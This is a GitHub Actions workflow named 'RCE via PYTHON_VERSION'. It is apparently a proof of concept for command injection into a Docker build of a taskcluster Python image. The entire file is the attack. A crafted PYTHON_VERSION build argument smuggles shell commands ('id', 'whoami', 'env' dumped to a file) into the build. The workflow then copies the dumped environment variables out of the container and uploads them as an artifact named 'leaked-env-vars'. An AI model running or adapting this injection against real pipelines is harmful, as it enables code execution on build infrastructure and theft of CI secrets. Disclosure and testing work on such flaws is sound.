name: RCE via PYTHON_VERSION

on: push

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Inject and Leak
        run: |
          mkdir -p output
          docker build \
            --build-arg PYTHON_VERSION="id && whoami && env > /leaks.txt && cp /leaks.txt /output/leaks.txt" \
            -t leak ./taskcluster/docker/python
          container_id=$(docker create leak)
          docker cp $container_id:/output/leaks.txt leaks.txt
          docker rm $container_id

      - name: Upload Leak Artifact
        uses: actions/upload-artifact@v4
        with:
          name: leaked-env-vars
          path: leaks.txt
